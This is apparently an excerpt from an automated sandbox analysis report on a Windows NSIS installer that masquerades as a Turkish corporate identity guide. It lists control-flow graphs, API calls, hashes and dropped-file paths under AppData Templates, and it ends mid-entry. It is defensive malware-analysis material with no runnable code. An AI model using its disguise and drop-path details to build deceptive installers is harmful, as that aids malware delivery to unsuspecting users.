                                                                                                                                                control_flow_graph 261 403d58-403d6a 262 403d70-403d76 261->262 263 403eab-403eba 261->263 262->263 264 403d7c-403d85 262->264 265 403f09-403f1e 263->265 266 403ebc-403f04 GetDlgItem * 2 call 404231 SetClassLongW call 40140b 263->266 270 403d87-403d94 SetWindowPos 264->270 271 403d9a-403d9d 264->271 268 403f20-403f23 265->268 269 403f5e-403f63 call 40427d 265->269 266->265 275 403f25-403f30 call 401389 268->275 276 403f56-403f58 268->276 283 403f68-403f83 269->283 270->271 272 403db7-403dbd 271->272 273 403d9f-403db1 ShowWindow 271->273 278 403dd9-403ddc 272->278 279 403dbf-403dd4 DestroyWindow 272->279 273->272 275->276 297 403f32-403f51 SendMessageW 275->297 276->269 282 4041fe 276->282 287 403dde-403dea SetWindowLongW 278->287 288 403def-403df5 278->288 284 4041db-4041e1 279->284 286 404200-404207 282->286 290 403f85-403f87 call 40140b 283->290 291 403f8c-403f92 283->291 284->282 292 4041e3-4041e9 284->292 287->286 295 403e98-403ea6 call 404298 288->295 296 403dfb-403e0c GetDlgItem 288->296 290->291 293 403f98-403fa3 291->293 294 4041bc-4041d5 DestroyWindow EndDialog 291->294 292->282 299 4041eb-4041f4 ShowWindow 292->299 293->294 300 403fa9-403ff6 call 4062dc call 404231 * 3 GetDlgItem 293->300 294->284 295->286 301 403e2b-403e2e 296->301 302 403e0e-403e25 SendMessageW IsWindowEnabled 296->302 297->286 299->282 331 404000-40403c ShowWindow KiUserCallbackDispatcher call 404253 EnableWindow 300->331 332 403ff8-403ffd 300->332 305 403e30-403e31 301->305 306 403e33-403e36 301->306 302->282 302->301 309 403e61-403e66 call 40420a 305->309 310 403e44-403e49 306->310 311 403e38-403e3e 306->311 309->295 315 403e7f-403e92 SendMessageW 310->315 316 403e4b-403e51 310->316 314 403e40-403e42 311->314 311->315 314->309 315->295 319 403e53-403e59 call 40140b 316->319 320 403e68-403e71 call 40140b 316->320 327 403e5f 319->327 320->295 329 403e73-403e7d 320->329 327->309 329->327 335 404041 331->335 336 40403e-40403f 331->336 332->331 337 404043-404071 GetSystemMenu EnableMenuItem SendMessageW 335->337 336->337 338 404073-404084 SendMessageW 337->338 339 404086 337->339 340 40408c-4040cb call 404266 call 403d39 call 4062ba lstrlenW call 4062dc SetWindowTextW call 401389 338->340 339->340 340->283 351 4040d1-4040d3 340->351 351->283 352 4040d9-4040dd 351->352 353 4040fc-404110 DestroyWindow 352->353 354 4040df-4040e5 352->354 353->284 356 404116-404143 CreateDialogParamW 353->356 354->282 355 4040eb-4040f1 354->355 355->283 357 4040f7 355->357 356->284 358 404149-4041a0 call 404231 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 356->358 357->282 358->282 363 4041a2-4041ba ShowWindow call 40427d 358->363 363->284
                                                                                                                                                APIs
                                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D94
                                                                                                                                                • ShowWindow.USER32(?), ref: 00403DB1
                                                                                                                                                • DestroyWindow.USER32 ref: 00403DC5
                                                                                                                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DE1
                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 00403E02
                                                                                                                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403E16
                                                                                                                                                • IsWindowEnabled.USER32(00000000), ref: 00403E1D
                                                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 00403ECB
                                                                                                                                                • GetDlgItem.USER32(?,00000002), ref: 00403ED5
                                                                                                                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00403EEF
                                                                                                                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F40
                                                                                                                                                • GetDlgItem.USER32(?,00000003), ref: 00403FE6
                                                                                                                                                • ShowWindow.USER32(00000000,?), ref: 00404007
                                                                                                                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404019
                                                                                                                                                • EnableWindow.USER32(?,?), ref: 00404034
                                                                                                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040404A
                                                                                                                                                • EnableMenuItem.USER32(00000000), ref: 00404051
                                                                                                                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404069
                                                                                                                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040407C
                                                                                                                                                • lstrlenW.KERNEL32(0042D248,?,0042D248,00000000), ref: 004040A6
                                                                                                                                                • SetWindowTextW.USER32(?,0042D248), ref: 004040BA
                                                                                                                                                • ShowWindow.USER32(?,0000000A), ref: 004041EE
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1125006099.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1124979141.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125036975.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125264823.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3282139019-0
                                                                                                                                                • Opcode ID: 7123d0eaadf85c37b7798e08e10b1c5fe4a9df0faa1dcc76925985b39ebaeda9
                                                                                                                                                • Instruction ID: e03fc219ec92158800d4d40d681534e4389e9639ccb8e5563fa4604b390d03ca
                                                                                                                                                • Opcode Fuzzy Hash: 7123d0eaadf85c37b7798e08e10b1c5fe4a9df0faa1dcc76925985b39ebaeda9
                                                                                                                                                • Instruction Fuzzy Hash: 29C1D171600300ABDB216F61ED89E2B3AB8FB95746F04053EF641B51F0CB799982DB6D
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 366 4039aa-4039c2 call 406694 369 4039c4-4039d4 call 406201 366->369 370 4039d6-403a0d call 406188 366->370 379 403a30-403a59 call 403c80 call 405c97 369->379 375 403a25-403a2b lstrcatW 370->375 376 403a0f-403a20 call 406188 370->376 375->379 376->375 384 403aeb-403af3 call 405c97 379->384 385 403a5f-403a64 379->385 391 403b01-403b26 LoadImageW 384->391 392 403af5-403afc call 4062dc 384->392 385->384 386 403a6a-403a92 call 406188 385->386 386->384 393 403a94-403a98 386->393 395 403ba7-403baf call 40140b 391->395 396 403b28-403b58 RegisterClassW 391->396 392->391 397 403aaa-403ab6 lstrlenW 393->397 398 403a9a-403aa7 call 405bbc 393->398 410 403bb1-403bb4 395->410 411 403bb9-403bc4 call 403c80 395->411 399 403c76 396->399 400 403b5e-403ba2 SystemParametersInfoW CreateWindowExW 396->400 404 403ab8-403ac6 lstrcmpiW 397->404 405 403ade-403ae6 call 405b8f call 4062ba 397->405 398->397 403 403c78-403c7f 399->403 400->395 404->405 409 403ac8-403ad2 GetFileAttributesW 404->409 405->384 414 403ad4-403ad6 409->414 415 403ad8-403ad9 call 405bdb 409->415 410->403 419 403bca-403be4 ShowWindow call 406624 411->419 420 403c4d-403c55 call 4053f5 411->420 414->405 414->415 415->405 427 403bf0-403c02 GetClassInfoW 419->427 428 403be6-403beb call 406624 419->428 425 403c57-403c5d 420->425 426 403c6f-403c71 call 40140b 420->426 425->410 429 403c63-403c6a call 40140b 425->429 426->399 432 403c04-403c14 GetClassInfoW RegisterClassW 427->432 433 403c1a-403c3d DialogBoxParamW call 40140b 427->433 428->427 429->410 432->433 437 403c42-403c4b call 4038fa 433->437 437->403
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00406694: GetModuleHandleA.KERNEL32(?,00000020,?,00403401,0000000A), ref: 004066A6
                                                                                                                                                  • Part of subcall function 00406694: GetProcAddress.KERNEL32(00000000,?), ref: 004066C1
                                                                                                                                                • lstrcatW.KERNEL32(1033,0042D248), ref: 00403A2B
                                                                                                                                                • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403AAB
                                                                                                                                                • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000), ref: 00403ABE
                                                                                                                                                • GetFileAttributesW.KERNEL32(Call), ref: 00403AC9
                                                                                                                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula), ref: 00403B12
                                                                                                                                                  • Part of subcall function 00406201: wsprintfW.USER32 ref: 0040620E
                                                                                                                                                • RegisterClassW.USER32(00433E80), ref: 00403B4F
                                                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B67
                                                                                                                                                • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B9C
                                                                                                                                                • ShowWindow.USER32(00000005,00000000), ref: 00403BD2
                                                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit20W,00433E80), ref: 00403BFE
                                                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit,00433E80), ref: 00403C0B
                                                                                                                                                • RegisterClassW.USER32(00433E80), ref: 00403C14
                                                                                                                                                • DialogBoxParamW.USER32(?,00000000,00403D58,00000000), ref: 00403C33
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1125006099.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1124979141.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125036975.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125264823.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                • String ID: "C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                                • API String ID: 1975747703-4138962290
                                                                                                                                                • Opcode ID: 2904cd21c70d62866cc327d96625cdd9032e7e4c90c5b4ba07f750359117e74a
                                                                                                                                                • Instruction ID: 9f2b94ab3f1de80a41c8f53b965b22801f2352f665cd6d3f8e6571e1d6c0b700
                                                                                                                                                • Opcode Fuzzy Hash: 2904cd21c70d62866cc327d96625cdd9032e7e4c90c5b4ba07f750359117e74a
                                                                                                                                                • Instruction Fuzzy Hash: D861B9312407007ED720AF659D46E2B3A6CEB85B4AF40057FF945B51E2CBBD9941CB2D
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 440 402edd-402f2b GetTickCount GetModuleFileNameW call 405db0 443 402f37-402f65 call 4062ba call 405bdb call 4062ba GetFileSize 440->443 444 402f2d-402f32 440->444 452 403052-403060 call 402e79 443->452 453 402f6b 443->453 445 40310f-403113 444->445 459 403062-403065 452->459 460 4030b5-4030ba 452->460 455 402f70-402f87 453->455 457 402f89 455->457 458 402f8b-402f94 call 403331 455->458 457->458 465 402f9a-402fa1 458->465 466 4030bc-4030c4 call 402e79 458->466 463 403067-40307f call 403347 call 403331 459->463 464 403089-4030b3 GlobalAlloc call 403347 call 403116 459->464 460->445 463->460 487 403081-403087 463->487 464->460 491 4030c6-4030d7 464->491 469 402fa3-402fb7 call 405d6b 465->469 470 40301d-403021 465->470 466->460 478 40302b-403031 469->478 489 402fb9-402fc0 469->489 477 403023-40302a call 402e79 470->477 470->478 477->478 482 403040-40304a 478->482 483 403033-40303d call 406787 478->483 482->455 490 403050 482->490 483->482 487->460 487->464 489->478 493 402fc2-402fc9 489->493 490->452 494 4030d9 491->494 495 4030df-4030e4 491->495 493->478 496 402fcb-402fd2 493->496 494->495 497 4030e5-4030eb 495->497 496->478 498 402fd4-402fdb 496->498 497->497 499 4030ed-403108 SetFilePointer call 405d6b 497->499 498->478 501 402fdd-402ffd 498->501 502 40310d 499->502 501->460 503 403003-403007 501->503 502->445 504 403009-40300d 503->504 505 40300f-403017 503->505 504->490 504->505 505->478 506 403019-40301b 505->506 506->478
                                                                                                                                                APIs
                                                                                                                                                • GetTickCount.KERNEL32 ref: 00402EEE
                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exe,00000400,?,00000006,00000008,0000000A), ref: 00402F0A
                                                                                                                                                  • Part of subcall function 00405DB0: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405DB4
                                                                                                                                                  • Part of subcall function 00405DB0: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DD6
                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exe,C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F56
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1125006099.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1124979141.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125036975.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125264823.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                • String ID: "C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                • API String ID: 4283519449-2448680666
                                                                                                                                                • Opcode ID: 9da78bb69fdb731252d5033ab884fa182416324aee7ddcf9fc3f40609bcd7e9e
                                                                                                                                                • Instruction ID: dd9ea635540f9dffb1b2b479f8e1e5c18960c1b6140bd96a969558b27d112ec4
                                                                                                                                                • Opcode Fuzzy Hash: 9da78bb69fdb731252d5033ab884fa182416324aee7ddcf9fc3f40609bcd7e9e
                                                                                                                                                • Instruction Fuzzy Hash: C151F471901205ABDB20AF60DD85B9F7FA8FB0431AF15403BF910B62D5C7789E408BAD
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 720 4062dc-4062e7 721 4062e9-4062f8 720->721 722 4062fa-406310 720->722 721->722 723 406316-406323 722->723 724 406528-40652e 722->724 723->724 725 406329-406330 723->725 726 406534-40653f 724->726 727 406335-406342 724->727 725->724 729 406541-406545 call 4062ba 726->729 730 40654a-40654b 726->730 727->726 728 406348-406354 727->728 731 406515 728->731 732 40635a-406398 728->732 729->730 736 406523-406526 731->736 737 406517-406521 731->737 734 4064b8-4064bc 732->734 735 40639e-4063a9 732->735 740 4064be-4064c4 734->740 741 4064ef-4064f3 734->741 738 4063c2 735->738 739 4063ab-4063b0 735->739 736->724 737->724 747 4063c9-4063d0 738->747 739->738 744 4063b2-4063b5 739->744 745 4064d4-4064e0 call 4062ba 740->745 746 4064c6-4064d2 call 406201 740->746 742 406502-406513 lstrlenW 741->742 743 4064f5-4064fd call 4062dc 741->743 742->724 743->742 744->738 750 4063b7-4063ba 744->750 756 4064e5-4064eb 745->756 746->756 752 4063d2-4063d4 747->752 753 4063d5-4063d7 747->753 750->738 757 4063bc-4063c0 750->757 752->753 754 406412-406415 753->754 755 4063d9-406400 call 406188 753->755 761 406425-406428 754->761 762 406417-406423 GetSystemDirectoryW 754->762 768 4064a0-4064a3 755->768 769 406406-40640d call 4062dc 755->769 756->742 760 4064ed 756->760 757->747 764 4064b0-4064b6 call 40654e 760->764 766 406493-406495 761->766 767 40642a-406438 GetWindowsDirectoryW 761->767 765 406497-40649b 762->765 764->742 765->764 771 40649d 765->771 766->765 770 40643a-406444 766->770 767->766 768->764 774 4064a5-4064ab lstrcatW 768->774 769->765 776 406446-406449 770->776 777 40645e-406474 SHGetSpecialFolderLocation 770->777 771->768 774->764 776->777 781 40644b-406452 776->781 778 406476-40648d SHGetPathFromIDListW CoTaskMemFree 777->778 779 40648f 777->779 778->765 778->779 779->766 782 40645a-40645c 781->782 782->765 782->777
                                                                                                                                                APIs
                                                                                                                                                • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040641D
                                                                                                                                                • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,0042C228,?,00405359,0042C228,00000000), ref: 00406430
                                                                                                                                                • SHGetSpecialFolderLocation.SHELL32(00405359,0041DA00,00000000,0042C228,?,00405359,0042C228,00000000), ref: 0040646C
                                                                                                                                                • SHGetPathFromIDListW.SHELL32(0041DA00,Call), ref: 0040647A
                                                                                                                                                • CoTaskMemFree.OLE32(0041DA00), ref: 00406485
                                                                                                                                                • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004064AB
                                                                                                                                                • lstrlenW.KERNEL32(Call,00000000,0042C228,?,00405359,0042C228,00000000), ref: 00406503
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1125006099.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1124979141.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125036975.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125264823.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                                                                • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$\oZ
                                                                                                                                                • API String ID: 717251189-2743552856
                                                                                                                                                • Opcode ID: be842abed2e65b63b3d72d51674aff3c14f059aabebd99e4c76d62d1777cce00
                                                                                                                                                • Instruction ID: 29f0adb049bea166a756856afc1b7ff582c4fdfd81cc2e884c30b49282791dbd
                                                                                                                                                • Opcode Fuzzy Hash: be842abed2e65b63b3d72d51674aff3c14f059aabebd99e4c76d62d1777cce00
                                                                                                                                                • Instruction Fuzzy Hash: E6611071A00111ABDF209F54DC41AAE37A9EF45318F26803FE943BA2D0D77D9AA1C79D
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                                                                                                • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula\Thaumaturgical146,?,?,00000031), ref: 004017D5
                                                                                                                                                  • Part of subcall function 004062BA: lstrcpynW.KERNEL32(?,?,00000400,00403460,Fjernbetjeningsenhedernes Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 004062C7
                                                                                                                                                  • Part of subcall function 00405322: lstrlenW.KERNEL32(0042C228,00000000,0041DA00,771A23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
                                                                                                                                                  • Part of subcall function 00405322: lstrlenW.KERNEL32(0040327A,0042C228,00000000,0041DA00,771A23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
                                                                                                                                                  • Part of subcall function 00405322: lstrcatW.KERNEL32(0042C228,0040327A), ref: 0040537D
                                                                                                                                                  • Part of subcall function 00405322: SetWindowTextW.USER32(0042C228,0042C228), ref: 0040538F
                                                                                                                                                  • Part of subcall function 00405322: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
                                                                                                                                                  • Part of subcall function 00405322: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
                                                                                                                                                  • Part of subcall function 00405322: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1125006099.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1124979141.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125036975.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125264823.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsa5F2F.tmp$C:\Users\user\AppData\Local\Temp\nsa5F2F.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula\Thaumaturgical146$Call
                                                                                                                                                • API String ID: 1941528284-3677193030
                                                                                                                                                • Opcode ID: b6e6f7bddc079f3ddd16634b2c61c6438f2a5172cea4a8ba22e449da941a997b
                                                                                                                                                • Instruction ID: 24a82d921ca393d09b0f70664e9a68f54f64900ed4cc6ef124b6c19d11fe7a64
                                                                                                                                                • Opcode Fuzzy Hash: b6e6f7bddc079f3ddd16634b2c61c6438f2a5172cea4a8ba22e449da941a997b
                                                                                                                                                • Instruction Fuzzy Hash: 12419371900518BACF107BA5DD46DAF3A79EF45368F20423FF422B10E1DA3C8A519A6D
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 913 403116-40312d 914 403136-40313f 913->914 915 40312f 913->915 916 403141 914->916 917 403148-40314d 914->917 915->914 916->917 918 40315d-40316a call 403331 917->918 919 40314f-403158 call 403347 917->919 923 403170-403174 918->923 924 40331f 918->924 919->918 925 4032ca-4032cc 923->925 926 40317a-4031c3 GetTickCount 923->926 927 403321-403322 924->927 928 40330c-40330f 925->928 929 4032ce-4032d1 925->929 930 403327 926->930 931 4031c9-4031d1 926->931 932 40332a-40332e 927->932 933 403311 928->933 934 403314-40331d call 403331 928->934 929->930 935 4032d3 929->935 930->932 936 4031d3 931->936 937 4031d6-4031e4 call 403331 931->937 933->934 934->924 945 403324 934->945 939 4032d6-4032dc 935->939 936->937 937->924 947 4031ea-4031f3 937->947 942 4032e0-4032ee call 403331 939->942 943 4032de 939->943 942->924 950 4032f0-4032fc call 405e62 942->950 943->942 945->930 949 4031f9-403219 call 4067f5 947->949 954 4032c2-4032c4 949->954 955 40321f-403232 GetTickCount 949->955 959 4032c6-4032c8 950->959 960 4032fe-403308 950->960 954->927 957 403234-40323c 955->957 958 40327d-40327f 955->958 962 403244-40327a MulDiv wsprintfW call 405322 957->962 963 40323e-403242 957->963 964 403281-403285 958->964 965 4032b6-4032ba 958->965 959->927 960->939 961 40330a 960->961 961->930 962->958 963->958 963->962 968 403287-40328e call 405e62 964->968 969 40329c-4032a7 964->969 965->931 966 4032c0 965->966 966->930 973 403293-403295 968->973 972 4032aa-4032ae 969->972 972->949 974 4032b4 972->974 973->959 975 403297-40329a 973->975 974->930 975->972
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1125006099.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1124979141.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
